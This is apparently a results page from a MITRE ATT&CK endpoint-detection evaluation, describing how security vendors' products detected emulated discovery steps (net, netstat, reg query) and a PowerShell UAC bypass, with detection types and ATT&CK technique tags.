Telemetry showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed powershell.exe executing net.exe with command-line arguments and enriched the command with the conditions Net Group Reconnaissance Command and Net LocalGroup Reconnaissance Command. The enrichment was tainted by the parent Script File Created alert. The condition contributing to Enrichment was added to the capability's detection after the start of the evaluation, so the detection is identified as a configuration change. See Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
Enrichment
The capability enriched net.exe with the correct ATT&CK Tactic (Discovery) and Technique (Permissions Group Discovery) and a suspicious indicator that the net utility was used to obtain information of user groups. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe. The telemetry was tainted by a trace detection on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Microsoft
General Behavior (Delayed)
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". Alert is based on the correlation of a chain of related behaviors across multiple steps. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry (Tainted)
Telemetry showed the execution sequence for powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by a prior suspicious PowerShell cmdlet alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing net with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment
The capability enriched net.exe executing with command-line arguments with the correct ATT&CK Technique (Permission Groups Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment (Tainted)
The capability enriched the execution of net.exe and net1.exe as the possible enumeration of administrator groups. The data was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
RSA
Telemetry
Telemetry showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6]
SentinelOne
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5]
Carbon Black
Enrichment
The capability enriched net.exe with a related ATT&CK Technique (T1069 - Permission Groups Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry
Telemetry within the process tree showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9]
CrowdStrike
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net user was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Cybereason
General Behavior (Tainted)
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (Account Discovery). The alert was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched the event with the correct ATT&CK Technique (T1087 - Account Discovery) and Tactic (Discovery). The enrichment was tainted by parent PowerShell alerts. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry (Tainted)
Telemetry showed net.exe executing with command-line arguments (tainted by parent PowerShell alerts). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
FireEye
Enrichment
The capability enriched net.exe with an alert for Net User Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1087 - Account Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified net.exe as a reconnaissance command used to capture information about local users. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
F-Secure
Telemetry
Telemetry showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9]
General Behavior
A General Behavior alert was generated showing that a spawned process (net.exe) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9]
GoSecure
Enrichment (Tainted)
The capability showed powershell.exe executing net.exe with command-line arguments and enriched the command with the condition Net User Reconnaissance Command. The enrichment was tainted by the parent Script File Created alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5]
McAfee
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe. The telemetry was tainted by a trace detection on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
The capability enriched net.exe with the correct ATT&CK Tactic (Discovery) and a related Technique (System Owner/User Discovery) and a suspicious indicator that the net utility was used to obtain information of user groups. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Microsoft
General Behavior (Delayed)
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". Alert is based on the correlation of a chain of related behaviors across multiple steps. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Telemetry (Tainted)
Telemetry showed the execution sequence for powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by a prior suspicious PowerShell cmdlet alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing net with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability enriched net.exe executing with command-line arguments with the correct ATT&CK Technique (Account Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
RSA
Telemetry
Telemetry showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6] [7] [8]
Carbon Black
Telemetry
Telemetry within the process tree showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
The capability enriched net.exe with a related ATT&CK Technique (T1069 - Permission Groups Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
CrowdStrike
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net user was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Cybereason
Telemetry
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
General Behavior (Tainted)
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (Account Discovery). The alert was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Endgame
Telemetry (Tainted)
Telemetry showed net.exe executing with command-line arguments (tainted by parent PowerShell alerts). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Enrichment (Delayed, Tainted)
The capability enriched the event with the correct ATT&CK Technique (T1087 - Account Discovery) and Tactic (Discovery). The enrichment was tainted by parent PowerShell alerts. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
FireEye
Enrichment
The capability enriched net.exe with an alert for Net User Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1087 - Account Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified net.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (net.exe) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry
Telemetry showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9]
GoSecure
Enrichment (Tainted)
The capability showed powershell.exe executing net.exe with command-line arguments and enriched the command with the condition Net User Reconnaissance Command. The enrichment was tainted by the parent Script File Created alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5]
McAfee
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe. The telemetry was tainted by a trace detection on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
The capability enriched net.exe with the correct ATT&CK Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence for powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by a prior suspicious PowerShell cmdlet alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Specific Behavior (Delayed)
A delayed Specific Behavior alert called "Reconnaissance using directory services queries" was generated for domain user enumeration. The vendor noted this was an Azure Advanced Threat Protection alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
General Behavior (Delayed)
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". Alert is based on the correlation of a chain of related behaviors across multiple steps. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Palo Alto Networks
Enrichment
The capability enriched net.exe executing with command-line arguments with the correct ATT&CK Technique (Account Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry (Tainted)
Telemetry showed powershell.exe executing net with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
RSA
Telemetry
Telemetry showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6] [7] [8]
Carbon Black
Telemetry
Telemetry showed a process tree containing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched net.exe with a related ATT&CK Technique (Account Discovery). [1] [2] [3] [4] [5] [6]
CrowdStrike
Enrichment (Tainted)
The capability enriched net.exe with a related ATT&CK Technique (Account Discovery) and the correct Tactic (Discovery). The process tree view showed the enrichment was tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net group was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry (Tainted)
Telemetry showed net.exe executing with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Cybereason
General Behavior (Tainted)
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (Remote System Discovery). The alert was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched net.exe with a related ATT&CK Technique (T1069 - Permission Groups Discovery) and the correct Tactic (Discovery). The enrichment was tainted by a parent alert. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6]
Telemetry (Tainted)
Telemetry showed net.exe executing with command-line arguments (tainted by parent alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6]
FireEye
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified net.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1018 - Remote System Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8]
F-Secure
Telemetry
Telemetry showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6]
General Behavior
A General Behavior alert was generated showing that a spawned process (net) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed powershell.exe executing net.exe with command-line arguments and enriched the command with the condition Net User Reconnaissance Command. The enrichment was tainted by the parent Script File Created alert. The condition contributing to Enrichment was added to the capability's detection after the start of the evaluation, so the detection is identified as a configuration change. See Configuration page for details. [1] [2] [3]
McAfee
Enrichment
The capability enriched net.exe with the correct ATT&CK Tactic (Discovery) and Technique (Remote System Discovery) and a suspicious indicator that the net utility obtained information of domain computers and controllers. [1] [2] [3] [4] [5] [6]
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe. The telemetry was tainted by a trace detection on wscript.exe. [1] [2] [3] [4] [5] [6]
Microsoft
General Behavior (Delayed)
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". Alert is based on the correlation of a chain of related behaviors across multiple steps. [1] [2] [3] [4] [5] [6] [7]
Telemetry (Tainted)
Telemetry showed execution of net.exe with command-line arguments (tainted by parent PowerShell malicious cmdlet alert). [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing net with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment (Tainted)
The capability enriched the execution of net.exe and net1.exe as an enumeration command. The data was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8]
RSA
Telemetry
Telemetry showed execution of net.exe with command-line arguments. [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed execution of net.exe with command-line arguments. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
Telemetry
The vendor demonstrated to MITRE that the capability can provide telemetry of net.exe, but no screenshot was captured for this procedure. [1] [2] [3] [4] [5] [6] [7]
Enrichment
The capability enriched net.exe with a related ATT&CK Technique (Account Discovery). [1] [2] [3] [4] [5] [6] [7]
CrowdStrike
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net use was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7]
Telemetry (Tainted)
Telemetry showed net.exe executing with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7]
Cybereason
General Behavior (Tainted)
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (System Network Connections Discovery). The alert was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6]
Endgame
Telemetry (Tainted)
Telemetry showed execution of net.exe with command-line arguments (tainted by parent alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Specific Behavior (Tainted)
A Specific Behavior alert was triggered for enumerating Windows network admin shares as part of Discovery (tainted by parent alert). [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment (Delayed, Tainted)
The capability enriched net.exe with the correct ATT&CK Technique (T1049 - System Network Connections Discovery), a related ATT&CK Technique (Remote System Discovery), and the correct Tactic (Discovery). The enrichment was tainted by a parent alert. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9]
FireEye
Enrichment
The capability enriched net.exe with an alert for Net Use Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1049 - System Network Connections Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified net.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (net) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6]
GoSecure
Telemetry (Tainted)
Telemetry showed execution of net.exe with command-line arguments (tainted by the parent Script File Created alert). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3]
McAfee
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe. The telemetry was tainted by a trace detection on wscript.exe [1] [2] [3] [4] [5] [6]
Microsoft
Telemetry (Tainted)
Telemetry showed execution of net.exe with command-line arguments (tainted by parent PowerShell malicious cmdlet alert). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
General Behavior (Delayed)
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". Alert is based on the correlation of a chain of related behaviors across multiple steps. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing net with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5]
RSA
Telemetry
Telemetry showed execution of net.exe with command-line arguments. [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed execution of net.exe with command-line arguments. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
Enrichment
The capability enriched net.exe data with the correct ATT&CK Technique (T1049 - System Network Connections Discovery). [1] [2] [3] [4] [5] [6] [7]
Telemetry
Telemetry showed a process tree containing netstat.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7]
CrowdStrike
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because netstat was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7]
Telemetry (Tainted)
Telemetry showed netstat.exe executing with command-line arguments. The process tree view showed netstat.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7]
Cybereason
Enrichment (Tainted)
The capability enriched netstat.exe executing as Reconnaissance and the correct ATT&CK Technique (System Network Connections Discovery). The data was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed netstat.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched netstat.exe data with the correct ATT&CK Technique (T1049 - System Network Connections Discovery) and Tactic (Discovery) (tainted by parent alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry (Tainted)
Telemetry showed execution of netstat.exe with command-line arguments (tainted by parent alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9]
FireEye
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified netstat.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
The capability enriched netstat.exe with an alert for Netstat Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1049 - System Network Connections Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (netstat) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed powershell.exe executing netstat.exe with command-line arguments. [1] [2] [3] [4] [5] [6]
GoSecure
Telemetry (Tainted)
Telemetry showed execution of netstat.exe with command-line arguments (tainted by the parent Script File Created alert). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3]
McAfee
Enrichment
The capability enriched netstat.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Network Connections Discovery) and a suspicious indicator that the network protocol statistics were gathered. [1] [2] [3] [4] [5] [6]
Telemetry (Tainted)
Telemetry showed powershell.exe executing netstat.exe. The telemetry was tainted by a trace detection on wscript.exe. [1] [2] [3] [4] [5] [6]
Microsoft
Telemetry (Tainted)
Telemetry showed execution of netstat.exe (tainted by parent PowerShell malicious cmdlet alert). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
General Behavior (Delayed)
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". Alert is based on the correlation of a chain of related behaviors across multiple steps. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing netstat with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5]
RSA
None
No detection capability demonstrated for this procedure due to event suppression (previously detected). [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed execution of netstat.exe with command-line arguments. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
Enrichment
The capability enriched reg.exe data with the correct ATT&CK Technique (Query Registry). [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed a process tree containing reg.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8]
CrowdStrike
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because reg query was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry (Tainted)
Telemetry showed reg.exe executing with command-line arguments. The process tree view showed reg.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert identifying reg.exe execution as suspicious. The alert was tainted by a parent powershell.exe detection. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Cybereason
Telemetry (Tainted)
Telemetry showed reg.exe executing with command-line arguments. The telemetry was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched reg.exe with the correct ATT&CK Technique (T1012 - Query Registry) and Tactic (Discovery) (tainted by parent alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry (Tainted)
Telemetry showed execution of reg.exe with command-line arguments (tainted by parent alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9]
FireEye
Enrichment
The capability enriched reg.exe with an alert for Reg Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1012 - Query Registry) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified reg.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
F-Secure
Enrichment
The capability enriched reg.exe indicating that a sensitive registry key was accessed for potential reconnaissance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry
Telemetry showed powershell.exe executing reg.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
GoSecure
Telemetry (Tainted)
Telemetry showed execution of reg.exe with command-line arguments (tainted by the parent Script File Created alert). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5]
McAfee
Enrichment
The capability enriched reg.exe with the correct ATT&CK Tactic (Discovery) and Technique (Query Registry) and a suspicious indicator that reg.exe utility queried the Registry. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry (Tainted)
Telemetry showed powershell.exe executing reg.exe. The telemetry was tainted by a trace detection on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Microsoft
Telemetry (Tainted)
Telemetry showed execution of reg.exe with command-line arguments (tainted by suspicious sequence of exploration activities alert). [1] [2] [3] [4] [5] [6] [7] [8]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing reg with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Enrichment
The capability enriched reg.exe executing with command-line arguments with the correct ATT&CK Technique (Query Registry). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
RSA
Telemetry
Telemetry showed execution of reg.exe with command-line arguments. [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed execution of reg.exe with command-line arguments. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
None
No detection capability demonstrated for this procedure.
CrowdStrike
Specific Behavior (Delayed)
The OverWatch team also sent an email indicating a Specific Behavior was observed because a base64 obfuscated PowerShell command was used to invoke UAC bypass. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4]
Telemetry
Telemetry showed an integrity level change through a query for powershell.exe processes of high integrity (12288/0x3000) that were created by medium integrity processes (8192/0x2000), which is indicative of bypassing UAC. Telemetry also showed the Invoke-BypassUACTokenManipulation function in the script. [1] [2] [3] [4]
Cybereason
Telemetry (Tainted)
Telemetry showed an integrity level change from medium to high for powershell.exe, which is indicative of bypass UAC. The telemetry was tainted by a parent Malicious use of PowerShell alert. [1] [2] [3] [4] [5]
Endgame
Telemetry
Telemetry showed a mismatch between the logon id (authentication id) of parent (powershell.exe - 312288) and child (powershell.exe - 10184789) processes indicating that a different token was used. Though no screenshot for this data is available, this information can be used to trace back to the logon event for that logon id to display the process integrity level indicative of the elevated token used for bypass UAC. [1] [2] [3]
FireEye
Telemetry (Configuration Change)
Telemetry showed execution of powershell.exe as a high integrity process as SYSTEM with a token login ID previously associated with user Bob, which indicates UAC bypassing. A Configuration Change was made in order to collect Windows Event Logs for events 4627 (Group Membership Information) and 4673 (A privileged service was called). [1] [2] [3] [4]
F-Secure
Telemetry
Telemetry showed an elevated PowerShell spawned under the context of user Bob from an unelevated parent process. [1] [2] [3]
General Behavior
A General Behavior alert was generated for a possible PowerShell privilege escalation based on the elevation of a child process from a non-elevated parent. [1] [2] [3]
GoSecure
None
